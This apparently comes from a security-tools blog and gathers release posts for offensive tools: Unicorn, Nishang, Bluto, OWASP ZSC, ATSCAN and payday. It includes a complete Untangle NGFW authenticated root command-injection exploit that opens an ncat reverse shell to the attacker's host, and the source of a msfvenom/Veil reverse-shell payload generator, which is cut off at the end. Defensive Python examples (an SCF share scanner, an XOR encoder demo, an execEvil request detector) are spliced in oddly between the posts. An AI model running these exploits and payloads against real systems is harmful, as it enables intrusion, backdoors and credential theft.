                history_help()
    except (KeyboardInterrupt, EOFError):
        print "bye ^^"


prez()
main()

Source: https://github.com/graniet

Magic Unicorn Attack Vector v2.3.1


changelog v2.3.1:
+ unicorn.py: fix indent issue and take out long load times

Unicorn is a PowerShell injection tool utilizing Matthew Graeber's attack, expanded to automatically downgrade the process if a 64-bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Requirements:
+ Metasploit Framework

Attack Options:
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERUTIL Attack Instruction
+ Custom PS1 Attack Instructions

Usage:

git clone https://github.com/trustedsec/unicorn && cd unicorn
./unicorn --help
Update:
cd unicorn
git pull origin master

Example use:
python unicorn.py payload reverse_ipaddr port
Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download : Master.zip | Clone Url
Source: TrustedSec | https://www.trustedsec.com/ | Our Post Before

Nishang v0.6.8 – PowerShell for penetration testing and offensive security.


changelog v0.6.8:
+ Added Out-SCF in the Client directory.
The script generates an SCF file. The file (default name “SystemCatalog.scf”) needs to be put on a share. Whenever a user opens the file on the share, his credentials are sent to the specified capture server. The IP address of the capture server is specified in the icon field.
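Because the IconFile entry of an SCF file can name a UNC path, a share owner can audit shares for SCF files whose icon is fetched from a host that is not a known file server. The following Python 3 script is an added example written from the defender's side, not part of Nishang: it parses the INI-style SCF format, extracts the UNC host from IconFile, and walks a mounted share for SCF files pointing off an allowlist. The sample file bodies, the allowlist and all function names are assumptions made here.

```python
import os
import re

# SCF (Shell Command File) is a tiny INI-style format read by Windows Explorer:
#   [Shell]
#   Command=2
#   IconFile=\\server\share\icon.ico
#   [Taskbar]
#   Command=ToggleDesktop
# Explorer fetches IconFile to draw the icon, so a UNC path there makes the client
# authenticate to that host. Any file name works, not only the default SystemCatalog.scf.
UNC_HOST_RE = re.compile(r'^\\\\([^\\\s]+)')

# Constructed sample bodies for the demo below (192.0.2.10 is a documentation address)
SAMPLE_UNC_SCF = "[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\\icon.ico\n[Taskbar]\nCommand=ToggleDesktop\n"
SAMPLE_LOCAL_SCF = "[Shell]\nCommand=2\nIconFile=C:\\Windows\\explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"


def parse_scf(text):
    """Return {section: {key: value}} with section and key names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif '=' in line and current is not None:
            key, _, value = line.partition('=')
            sections[current][key.strip().lower()] = value.strip()
    return sections


def scf_icon_host(text):
    """Return the host named by a UNC IconFile path, or None for a local icon path."""
    icon = parse_scf(text).get('shell', {}).get('iconfile', '')
    m = UNC_HOST_RE.match(icon)
    return m.group(1) if m else None


def is_suspicious_scf(text, trusted_hosts):
    """True when the icon is pulled over UNC from a host outside the allowlist."""
    host = scf_icon_host(text)
    if host is None:
        return False
    return host.lower() not in {h.lower() for h in trusted_hosts}


def scan_share(root, trusted_hosts):
    """Walk a mounted share; return [(path, icon_host)] for SCF files pointing off-allowlist."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith('.scf'):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, 'r', errors='replace') as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip it rather than abort the whole scan
            if is_suspicious_scf(text, trusted_hosts):
                hits.append((path, scf_icon_host(text)))
    return hits


if __name__ == '__main__':
    # assumed allowlist of internal file servers whose icons may legitimately be referenced
    trusted = ['fileserver01', 'fileserver02']
    print(scf_icon_host(SAMPLE_UNC_SCF), is_suspicious_scf(SAMPLE_UNC_SCF, trusted))      # 192.0.2.10 True
    print(scf_icon_host(SAMPLE_LOCAL_SCF), is_suspicious_scf(SAMPLE_LOCAL_SCF, trusted))  # None False
```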

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Scripts: Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster, FireListener : A pair of scripts for egress testing.
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys : Get WLAN keys in plain text from a target.
– Keylogger : Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade : Dump user passwords in plain text on Windows 8.1 and Server 2012.
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– Create-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote : Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay : Create network relays between computers.

+ Prasadhak
– Prasadhak : Check the hashes of running processes against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent.
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remove persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip | Our Post Before
Source : http://www.labofapenetrationtester.com/

Bluto v1.1.22 ~ DNS Recon | Brute Forcer | DNS Zone Transfers | Email Enumeration | User Enumeration.

Changelog v1.1.22 Full Featured:
+ setup.py and Bluto folder version Fix.

Bluto v1.1.22

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. Each of the target domain's NS records is then queried for a potential zone transfer. If none of them gives up their spinach, Bluto brute forces subdomains using parallel sub-processing over the top 20,000 entries of the Alexa Top 1 Million subdomain list. NetCraft results are presented individually and are then compared with the brute force results; duplicates are removed and particularly interesting results are highlighted.

Bluto has been tested on Ubuntu, Arch Linux, CentOS, FreeBSD, Red Hat, Fedora, Debian and Kali 2.0.

Installation And Update Using Git:

pip install git+git://github.com/RandomStorm/Bluto
Upgrade:
pip install git+git://github.com/RandomStorm/Bluto --upgrade

Our Post Before
Source: https://github.com/RandomStorm

OWASP ZSC v1.0.9-git ~ Shellcode/Obfuscate Code Generator.

Latest Change v1.0.9-git:
+ commands.py; Download and Execute Shellcode.
+ stack.py & opcoder.py; Windows Exec Shellcode and Opcoder.
+ lib/generator/windows/download_exec.py; Download and Execute Shellcode.

THIS SOFTWARE WAS CREATED TO CHALLENGE ANTIVIRUS TECHNOLOGY, RESEARCH NEW ENCRYPTION METHODS, AND PROTECT SENSITIVE OPEN SOURCE FILES WHICH INCLUDE IMPORTANT DATA. CONTRIBUTORS AND OWASP FOUNDATION WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL USAGE.

OWASP ZSC is open source software written in python which lets you generate customized shellcode and convert scripts to an obfuscated script. This software can be run on Windows/Linux/OSX with python.

Why use OWASP ZSC ?
Compared with other shellcode generators such as the Metasploit tools, OWASP ZSC uses new encodings and methods intended to evade antivirus detection. The ZSC encoders can generate shellcode with random encodings, which lets you produce thousands of new, dynamic shellcodes that do the same job in a second: you will not get the same code twice if you use random encodes with the same commands. Shellcode generation for more operating systems is planned for future versions, and the same applies to code obfuscation.
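To make the "random encode" idea concrete, here is an added example that is not OWASP ZSC's own encoder: a single-byte XOR encoding with a freshly chosen key per run (a stand-in for ZSC's real encoders, which are more involved). Each run yields a different blob that decodes to the same bytes, and the key is rejected if it would leave a NUL byte in the output, the classic constraint on shellcode that travels through string functions. The shellcode bytes are constructed for the example and are not a working payload.

```python
import os

# Added example, not OWASP ZSC code: one random XOR "encode" per run, with the
# NUL-free constraint that real shellcode encoders have to honour.

# Constructed sample bytes (not a real payload); deliberately contains a 0x00.
SAMPLE_SHELLCODE = bytes([0x31, 0xC0, 0x50, 0x68, 0x2F, 0x2F, 0x73, 0x68, 0x00, 0x90])


def pick_key(data, tries=256):
    """Return a random single-byte key that maps no byte of data to 0x00.

    b ^ key == 0 exactly when b == key, so any key that does not occur in the
    input is NUL-free; we retry with fresh randomness until we find one.
    """
    for _ in range(tries):
        key = os.urandom(1)[0]
        if key != 0 and all(b ^ key != 0 for b in data):
            return key
    raise ValueError("no NUL-free key found")


def xor_encode(data, key=None):
    """Encode data with key (random if None); return (key, encoded_bytes)."""
    key = pick_key(data) if key is None else key
    return key, bytes(b ^ key for b in data)


def xor_decode(key, encoded):
    """Inverse of xor_encode; this is what a decoder stub would do at runtime."""
    return bytes(b ^ key for b in encoded)


def has_nul(blob):
    return b"\x00" in blob


if __name__ == "__main__":
    k1, e1 = xor_encode(SAMPLE_SHELLCODE)
    k2, e2 = xor_encode(SAMPLE_SHELLCODE)
    print("key1=%#04x key2=%#04x encoded blobs differ: %s" % (k1, k2, e1 != e2))
    print("NUL-free:", not has_nul(e1) and not has_nul(e2))
    assert xor_decode(k1, e1) == xor_decode(k2, e2) == SAMPLE_SHELLCODE
```

Note that the encoded bytes changing on every run only defeats signatures on the blob itself; the decoder stub that must accompany it is constant unless it is randomised too, which is where generators like ZSC spend most of their effort.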

Use and Download:

git clone https://github.com/Ali-Razmjoo/OWASP-ZSC && cd OWASP-ZSC
python zsc.py

Update:
git pull origin master
(or type update at the zsc console)

Source: https://github.com/Ali-Razmjoo

Untangle NGFW v12.1.0 beta execEvil() authenticated root CI exploit.

Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit.
A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).

Disclosure Timeline:
22/4/2016: Attempted to contact vendor after discovery of vulnerabilities
6/5/2016: No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
12/5/2016: US-CERT confirms contacting vendor
16/6/2016: US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
27/6/2016: Public disclosure

Usage:

git clone https://github.com/3xocyte/Exploits && cd Exploits
python untangle-ngfw-12.1-ci.py <RHOST> <LHOST> <username> <password>

Script:

#!/usr/bin/python

# Title: 			Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit
# CVE:				(Not yet assigned)
# Discovery:			Matt Bush (@3xocyte)
# Exploit:			Matt Bush
# Contact:			mbush@themissinglink.com.au

# Disclosure Timeline:
# 22/4/2016			Attempted to contact vendor after discovery of vulnerabilities
# 6/5/2016			No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
# 12/5/2016			US-CERT confirms contacting vendor
# 16/6/2016			US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
# 27/6/2016 			Public disclosure

# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with
# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous 
# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages
# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).

# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid.

import json, requests, sys

if len(sys.argv) < 5:
	print "[!] usage: " + sys.argv[0] + " <RHOST> <LHOST> <username> <password>"
	print "[!] and in a separate terminal: 'ncat --ssl -nlvp 443'"
	sys.exit()

print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit"
print "                          by @3xocyte\n"

rhost = sys.argv[1]
lhost = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]

login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator"
rpc_url = "http://" + rhost + "/webui/JSON-RPC"
auth = {'username': username, 'password': password}

print "[*] Opening session..."
session = requests.Session()

print "[*] Authenticating..."
try:
	login = session.post(login_url, data=auth)
	get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]}
	req_nonce = session.post(rpc_url, data=json.dumps(get_nonce))
	data = json.loads(req_nonce.text)
	nonce = data['result']
except:
	print "[!] Authentication failed. Quitting."
	sys.exit()

print "[*] Getting execManager objectID..."
try:
	get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]}
	req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id))
	data = json.loads(req_obj_id.text)
	object_id = data['result']['execManager']['objectID']

except:
	print "[!] Could not get execManager objectID. Quitting."
	sys.exit()

print "[*] Exploiting Ung.Main.getExecManager().execEvil()..."
try:
	exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]}
	session.post(rpc_url, data=json.dumps(exploit))
except:
	print "[!] Exploit failed. Quitting."
	sys.exit()

print "[*] Exploit sent!"
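For the defensive side, an added example that is neither the exploit author's nor Untangle's code: the JSON-RPC shape used above (a method named ".obj#<objectID>.execEvil" with the command as its only parameter) is distinctive enough to hunt for in captured request bodies. The detector below parses such bodies and flags execEvil calls, noting whether the command carries shell metacharacters or looks like a reverse shell. The sample bodies are constructed for the example.

```python
import json
import re

# Added example, not exploit or Untangle code: flag JSON-RPC bodies that call
# execManager.execEvil().  Method naming comes from the exploit above; the
# sample bodies below are constructed.

EXEC_EVIL_RE = re.compile(r"^\.obj#\d+\.execEvil$")
SHELL_META = set(";|&`$<>")  # characters that usually mean a crafted command
REVSHELL_HINTS = ("ncat", "nc ", "/bin/sh", "bash -i")


def inspect_rpc_body(raw_body):
    """Return a finding dict for one JSON-RPC body, or None if it is benign."""
    try:
        msg = json.loads(raw_body)
    except ValueError:
        return None  # not JSON-RPC at all
    if not isinstance(msg, dict):
        return None
    method = str(msg.get("method", ""))
    if not EXEC_EVIL_RE.match(method):
        return None
    cmd = " ".join(str(p) for p in (msg.get("params") or []))
    return {
        "id": msg.get("id"),
        "method": method,
        "command": cmd,
        "has_shell_meta": any(c in SHELL_META for c in cmd),
        "reverse_shell_hint": any(tok in cmd for tok in REVSHELL_HINTS),
    }


def scan_bodies(bodies):
    """Run inspect_rpc_body over an iterable of bodies, keeping only the hits."""
    return [f for f in (inspect_rpc_body(b) for b in bodies) if f]


SAMPLE_BODIES = [  # constructed for the example
    json.dumps({"id": 1, "nonce": "", "method": "system.getNonce", "params": []}),
    json.dumps({"id": 2, "nonce": "n1", "method": "UvmContext.getWebuiStartupInfo", "params": []}),
    json.dumps({"id": 3, "nonce": "n1", "method": ".obj#17.execEvil",
                "params": ["ncat --ssl -e /bin/sh 10.0.0.5 443"]}),
    json.dumps({"id": 4, "nonce": "n1", "method": ".obj#17.getSettings", "params": []}),
    json.dumps({"id": 5, "nonce": "n1", "method": ".obj#17.execEvil",
                "params": ["id; curl http://10.0.0.5/a | sh"]}),
    "not json at all",
]

if __name__ == "__main__":
    for hit in scan_bodies(SAMPLE_BODIES):
        print(hit)
```

Because the appliance defaults to plain HTTP for the admin UI, these bodies are visible to any network capture on the management segment; the same visibility that lets an attacker sniff credentials lets a defender run this check.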

Source: https://github.com/3xocyte


ATSCAN v9.5 stable – perl script for Search / Server / Site / Dork / Exploitation Scanner.

Changelog v9.5:
+ Best optimization.

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libraries to install:
apt-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works on Linux platforms. Best run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, CentOS. If you use Windows you can download the libraries manually.

Examples:
Simple search:
Search: --dork [dork] --level [level]
Search + get ip: --dork [dork] --level [level] --ip
Search + get ip + server: --dork [dork] --level [level] --ip --server
Search with many dorks: --dork [dork1,dork2,dork3] --level [level]
Search with a dorks file: --dork [dorks.txt] --level [level]
Search + set save file: --dork [dorks.txt] --level [level] --save myfile.txt
Search + Replace + Exploit: --dork [dorks.txt] --level [level] --replace [string] --with [string] --valid [string]

Subscan from Search Engine:
Search + Exploitation: --dork [dork] --level [10] --xss/--lfi/--wp ...
Search + Server Exploitation: -t [ip] --level [10] --xss/--lfi/--wp ...
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss/--lfi/--wp ...

Validation:
Search + Exploit + Validation: --dork [dork] --level [10] --exp --isup/--valid [string]
Search + Server Exploit + Validation: -t [ip] --level [10] --exp --isup/--valid [string]
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --isup/--valid [string]

Use List / Target:
-t [target/targets.txt] --exp --isup/--valid [string]
-t [target/targets.txt] --xss/--lfi ...

Server:
Get Server sites: -t [ip] --level [value] --sites
Get Server wordpress sites: -t [ip] --level [value] --wp
Get Server joomla sites: -t [ip] --level [value] --joom
Get Server upload sites: -t [ip] --level [value] --upload
Get Server zip sites files: -t [ip] --level [value] --zip
WP Arbitrary File Download: -t [ip] --level [value] --wpadf
Joomla RFI: -t [ip] --level [1] --joomfri --shell [shell link]
Scan basic tcp (quick): -t [ip] --ports --basic tcp
Scan basic udp (quick): -t [ip] --ports --basic udp
Scan basic udp+tcp: -t [ip] --ports --basic udp+tcp
Scan complete tcp: -t [ip] --ports --all tcp
Scan complete udp: -t [ip] --ports --all udp
Scan complete udp+tcp: -t [ip] --ports --all udp+tcp
Scan range tcp: -t [ip] --ports --select tcp --start [value] --end [value]
Scan range udp: -t [ip] --ports --select udp --start [value] --end [value]
Scan range udp + tcp: -t [ip] --ports --select udp+tcp --start [value] --end [value]

Encode / Decode:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

External Command:
--dork [dork/dorks.txt] --level [level] --command "curl -v --TARGET"
--dork [dork/dorks.txt] --level [level] --command "curl -v --FULL_TARGET"
-t [target/targets.txt] --level [level] --command "curl -v --TARGET"
-t [target/targets.txt] --command "curl -v --FULL_TARGET"

Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before Download: v9.5.zip | v9.5.tar.gz

payday v0.5 – Payload generator that uses Metasploit and Veil.

changelog v0.5:
+ payday.py : Added Veil path as variable in main function and then pass this to other function calls.

Payload generator that uses Metasploit and Veil. Takes IP address input and then builds payloads automatically. Calls Veil framework with supplied IP address and creates binaries and handlers. Uses msfvenom to create payloads and writes resource handler files in the same way that Veil does.

payday

Requirements:
+ Metasploit Framework
+ python 2.7.x
Options:
– Generate Metasploit Payloads
– Generate Veil Payloads
– Generate Both
– Clean Out Directories
– Specify custom output directory
– Clean custom output directory

Usage:

git clone https://github.com/lorentzenman/payday && cd payday
./payday.py
Update:
git pull origin master

Script:

#!/usr/bin/python
# Author : Matt Lorentzen
# version 0.5

import os, sys, time, argparse

def banner():

	version = "the kitchen sink edition"
    
	banner = """
                       _
 _ __   __ _ _   _  __| | __ _ _   _
| '_ \ / _` | | | |/ _` |/ _` | | | |
| |_) | (_| | |_| | (_| | (_| | |_| |
| .__/ \__,_|\__, |\__,_|\__,_|\__, |
|_|          |___/             |___/
                 %s
""" %version
     
	print redtxt(banner)


def msf_payloads(ip, output_dir):
	# Payloads Dictionary
	payloads = []

	payloads.append(["windows/meterpreter/reverse_tcp",443, "exe", "revmet.exe"])
	payloads.append(["windows/x64/meterpreter/reverse_tcp", 443, "exe", "revmet64.exe"])
	payloads.append(["windows/meterpreter/reverse_http",443, "exe", "methttp.exe"])
	payloads.append(["windows/meterpreter/reverse_https",443, "exe", "methttps.exe"])
	payloads.append(["windows/x64/meterpreter/reverse_tcp",443, "exe-service" , "serv64.exe"])
	payloads.append(["windows/meterpreter/reverse_tcp",443, "exe-service" ,"serv.exe"])
	payloads.append(["windows/meterpreter/reverse_tcp",443, "dll", "revmetdll.dll"])
	payloads.append(["windows/x64/meterpreter/reverse_tcp",443, "dll", "revmetdll64.dll"])

	#./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe

	for parms in payloads:
		lhost = ip
		payload = parms[0]
		lport = str(parms[1])
		output_type = parms[2]
		ext = parms[3]
		base = output_dir
		venom_cmd = "msfvenom -p " + payload + " LHOST=" + ip + " LPORT=" + lport + " -f " + output_type + " -o " + base + ext
		print "[!] Generating : " + bluetxt(payload)
		os.system(venom_cmd)
		print "[!] Generating handler for : " + bluetxt(payload)
		# strip off ext and replace with .rc

		handler = ext.split(".")[0] + ".rc"
		handler_file = open(base + "handlers/" + handler , "w")
		handler_file.write("use exploit/multi/handler\n")
		handler_file.write("set payload " + payload +"\n")
		handler_file.write("set LPORT 443\n")
		handler_file.write("set LHOST " + ip + "\n")
		handler_file.write("set ExitOnSession False\n")
		handler_file.write("exploit -j -z\n")
		handler_file.close()
		print "[!] Generated : " + yellowtxt(handler) + "\n\n"


def veil_payloads(ip, output_dir, move_payloads, veil_script):
	""" Takes local IP address as LHOST parm and builds Veil payloads"""
	# Veil doesn't have a custom output directory option and the default path gets pulled from the config file
	# hacky approach :: copy each generated payload and handler in to the custom output directory if it is supplied
	# start empty list to hold
	payloads = []
	# appends payloads with nested 3 value list for dynamic parm calling
	payloads.append(["cs/meterpreter/rev_https", 443, "veil_rev_https"])
	payloads.append(["c/meterpreter/rev_tcp",443,"veil_rev_tcp_met"])
	payloads.append(["c/meterpreter/rev_http_service",443, "veil_rev_http_srv"])


	print "Creating Veil Goodness"
	for parms in payloads:
		lhost = ip
		payload = parms[0]
		lport = str(parms[1])
		output = parms[2]
		command = ("-p " + payload + " -c LHOST=" + lhost + " LPORT=" + lport + " -o " + output + " --overwrite")
		os.system(veil_script + " " + command)
		time.sleep(2)
		# if using a custom output directory, veil doesn't have an option to specify the base directory as it gets this from the conf file
		# payload generated above has unique 'base' name - access the list and check the boolean flag that is pushed in
		# if this is true, move the file/handler into the custom output directory so that all payloads are in custom location
		if move_payloads == True:
			# move payload
			os.system("mv /root/payloads/windows/" + output + ".exe "  + output_dir)
			os.system("mv /root/payloads/windows/" + output + ".dll "  + output_dir)
			# move handler
			os.system("mv /root/payloads/windows/handlers/" + output + "_handler.rc " + output_dir + "handlers")

def php_payloads(ip, output_dir):
	""" Creates PHP based raw shell and outputs as txt ready for RFI """
	payloads = []
	payloads.append(["php/meterpreter/reverse_tcp", 443, "raw" ,"pshell.txt"])
	# TODO : push out the payload generation to a dedicated function to remove the code duplication
	for parms in payloads:
		lhost = ip
		payload = parms[0]
		lport = str(parms[1])
		output_type = parms[2]
		ext = parms[3]
		base = output_dir
		venom_cmd = "msfvenom -p " + payload + " LHOST=" + ip + " LPORT=" + lport + " -f " + output_type + " -o " + base + ext
		print "[!] Generating : " + bluetxt(payload)
		os.system(venom_cmd)
		print "[!] Generating handler for : " + bluetxt(payload)
		# strip off ext and replace with .rc

		handler = ext.split(".")[0] + ".rc"
		handler_file = open(base + "handlers/" + handler , "w")
		handler_file.write("use exploit/multi/handler\n")
		handler_file.write("set payload " + payload +"\n")
		handler_file.write("set LPORT 443\n")
		handler_file.write("set LHOST " + ip + "\n")
		handler_file.write("set ExitOnSession False\n")
		handler_file.write("exploit -j -z\n")
		handler_file.close()
		print "[!] Generated : " + yellowtxt(handler) + "\n\n"
	
	# close this file and then move to backup - crazy stuff to get around read/write/edit locks
	orig_file = str(base + ext)
	backup_file = orig_file + '.bak'
	os.rename(orig_file, backup_file)
	# now open this file and remove the comments in php so that the file works
	holding = open(backup_file, 'r')
	new_file = open(orig_file, 'w')
	lines = holding.readlines()
	for line in lines:
		# msfvenom's raw PHP output opens with '/*<?php /**/'; turn that into a real open tag
		if line.startswith('/*<?php /**/'):
			line = line.replace('/*<?php /**/', '<?php')
		# every line must be written, and the file closed only after the loop
		# (closing it inside the loop silently dropped everything after the first line)
		new_file.write(line)
	new_file.close()
	holding.close()
	os.remove(str(backup_file))




def clean(payload_path, veil_script):
	""" Cleans out directory """
	# start with default Veil direcory - gets rid of hashes etc
	os.system(veil_script + " --clean")
	os.system("clear")
	print yellowtxt("[!] Now cleaning default output directory\n")
	# clean out generated payloads in default or custom directory
	for file in os.listdir(payload_path):
		file = payload_path + file
		if os.path.isfile(file):
			print "[!] Removing " + bluetxt(file)
			os.remove(file)



def get_payload_output(payload_output_dir):
	""" Builds directory structure if output option is supplied """
	output_dir = payload_output_dir
	# check to see if the trailing slash has been added to the path : ie /root/path
	if not output_dir.endswith("/"):
		output_dir = output_dir + "/"

	# creates the structure if it doesn't exist
	if not os.path.isdir(output_dir):
		print yellowtxt("[!] Creating output directory structure")
		os.mkdir(output_dir)
		os.chdir(output_dir)
		os.mkdir('handlers')

	return output_dir



###############################
### 	Helper Function	    ###
###############################

def redtxt(text2colour):
	redstart = "\033[0;31m"
	redend = "\033[0m"
	return redstart + text2colour + redend

def greentxt(text2colour):
	greenstart = "\033[0;32m"
	greenend = "\033[0m"
	return greenstart + text2colour + greenend

def yellowtxt(text2colour):
	yellowstart = "\033[0;33m"
	yellowend = "\033[0m"
	return yellowstart + text2colour + yellowend

def bluetxt(text2colour):
	bluestart = "\033[0;34m"
	blueend = "\033[0m"
	return bluestart + text2colour + blueend



##############################
##	 Main Function	   ###
##############################


def Main():
	# program version
	version = 0.5
	banner()
	default_path = '/root/payloads/windows'
	veil_script = '/root/tools/attacking/Veil/Veil-Evasion/./Veil-Evasion.py'

	parser = argparse.ArgumentParser(description="Payday Payload Generator :: Takes the IP Address and then builds meterpreter windows payloads using msfvenom and veil. Outputs to '/root/payloads/windows/' by default.")
	parser.add_argument("--veil", action="store_true", help='Veil Payloads')
	parser.add_argument("--msf", action="store_true", help='MSF Payloads > tcp/exe, tcp/http(s), exe-service, dll')
	parser.add_argument("--php", action="store_true", help='Creates PHP payload as txt file for LFI/RFI')
	parser.add_argument("--clean", action="store_true", help="Cleans out existing files in the output directory")
	parser.add_argument("--output", help="Specify new output directory.")
	parser.add_argument("--ip", help='Specify Local IP Address for reverse connections')
	

	# counts the supplied number of arguments and prints help if they are missing
	if len(sys.argv)==1:
		parser.print_help()
			
		sys.exit(1)

	args = parser.parse_args()

	# default variable setup
	ip = args.ip
	output_dir = ""
	move_payloads = False

	# set up default path
	if args.output:
		output = args.output
		output_dir = get_payload_output(output)
		move_payloads = True

	else:
		# default directory output :: Veil config points to the this location
		output_dir = "/root/payloads/windows/"
		# add check to see if this direcory exists and if not, create it
		if not os.path.isdir(output_dir):
			print bluetxt("[*] The default path : %s is missing") %output_dir
